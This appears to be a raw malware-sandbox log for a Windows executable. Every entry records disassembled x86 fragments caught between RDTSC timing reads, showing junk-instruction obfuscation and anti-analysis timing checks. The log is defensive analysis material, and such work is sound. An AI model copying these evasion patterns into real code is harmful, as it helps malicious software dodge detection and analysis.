          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3306B second address: E3309E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0821212AF6h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0821212AEEh 0x0000000f jno 00007F0821212AE8h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jne 00007F0821212AECh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3309E second address: E330A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E380DE second address: E380E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43419 second address: E4341D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41F39 second address: E41F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0821212AE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41F4A second address: E41F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41F4E second address: E41F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41F52 second address: E41F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41F58 second address: E41F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E41F5E second address: E41F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0820DCC6ACh 0x00000009 jmp 00007F0820DCC6B0h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E420D1 second address: E420FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F0821212AEDh 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007F0821212AE6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push ecx 0x0000001a jbe 00007F0821212AE6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E420FB second address: E42105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42105 second address: E4210B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E488AA second address: E488AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E488AE second address: E488B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E572D3 second address: E572E9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0820DCC6AAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F0820DCC6A6h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56E9F second address: E56EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0821212AF9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59446 second address: E5944C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5944C second address: E59450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59450 second address: E59454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59454 second address: E59460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0821212AE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59460 second address: E59485 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0820DCC6A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F0820DCC6B1h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58FA8 second address: E58FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0821212AE6h 0x00000010 jmp 00007F0821212AF8h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58FD0 second address: E58FF3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0820DCC6A6h 0x00000008 jl 00007F0820DCC6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 jo 00007F0820DCC6ACh 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E69FA0 second address: E69FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E72D98 second address: E72D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E737B1 second address: E737BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E79184 second address: E7918E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78D0B second address: E78D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0821212AF1h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78D28 second address: E78D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78D2C second address: E78D3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 js 00007F0821212AE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78E89 second address: E78E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78E8E second address: E78EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0821212AE6h 0x0000000b pop edx 0x0000000c jl 00007F0821212AECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78EA2 second address: E78EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F0820DCC6A6h 0x00000011 pop edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78EB4 second address: E78EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0821212AE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E78EC0 second address: E78EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CE2B second address: E7CE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F0821212AEAh 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8736C second address: E8737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8737A second address: E87380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89F21 second address: E89F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89F26 second address: E89F2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89F2B second address: E89F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0820DCC6A6h 0x0000000a jng 00007F0820DCC6A6h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89F3F second address: E89F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89F45 second address: E89F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E847CD second address: E847D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A85B second address: E9A896 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0820DCC6B8h 0x0000000f jng 00007F0820DCC6A6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C581 second address: E9C59A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C59A second address: E9C5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2CCE second address: EB2CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0821212AE6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2CD8 second address: EB2CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6ADh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e js 00007F0820DCC6ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E9E second address: EB2EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0821212AF1h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB314A second address: EB314E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB314E second address: EB3152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3152 second address: EB3162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0820DCC6AAh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3162 second address: EB3179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AF1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3179 second address: EB317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB317D second address: EB3195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3195 second address: EB319B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB319B second address: EB31A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3736 second address: EB373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB389A second address: EB38A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB38A7 second address: EB38BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0820DCC6ACh 0x00000009 jnl 00007F0820DCC6A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3A00 second address: EB3A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3A0A second address: EB3A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3A0E second address: EB3A18 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0821212AE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3B9F second address: EB3BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0820DCC6B5h 0x0000000d je 00007F0820DCC6A8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB3BC4 second address: EB3BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0821212AF1h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jng 00007F0821212B00h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB55D5 second address: EB5602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0820DCC6B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jnc 00007F0820DCC6A6h 0x00000012 pop edx 0x00000013 jl 00007F0820DCC6ACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7E3E second address: EB7E48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7E48 second address: EB7E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB81D4 second address: EB81D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84CB second address: EB84E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0820DCC6B7h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84E6 second address: EB84F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84F5 second address: EB84F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84F9 second address: EB84FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB84FF second address: EB8505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8505 second address: EB8509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8509 second address: EB855C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F0820DCC6B2h 0x0000000e push dword ptr [ebp+122D23DBh] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F0820DCC6A8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e call 00007F0820DCC6A9h 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB855C second address: EB8561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB8561 second address: EB856B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0820DCC6A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9FC3 second address: EB9FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9FC7 second address: EB9FCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9FCD second address: EB9FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0821212AF4h 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jc 00007F0821212AE6h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9B89 second address: EB9B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBBB1E second address: EBBB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBBB23 second address: EBBB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0820DCC6A6h 0x0000000a jc 00007F0820DCC6A6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7253 second address: DC7257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7257 second address: DC725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499037E second address: 49903C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0821212AF0h 0x0000000f push eax 0x00000010 jmp 00007F0821212AEBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0821212AF5h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49903C9 second address: 49903F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0820DCC6B7h 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49903F1 second address: 49903F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49903F5 second address: 4990411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990411 second address: 499043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0821212AF5h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499043A second address: 4990440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49904AB second address: 49904BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AEEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49904BD second address: 49904C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0779 second address: 49B0794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
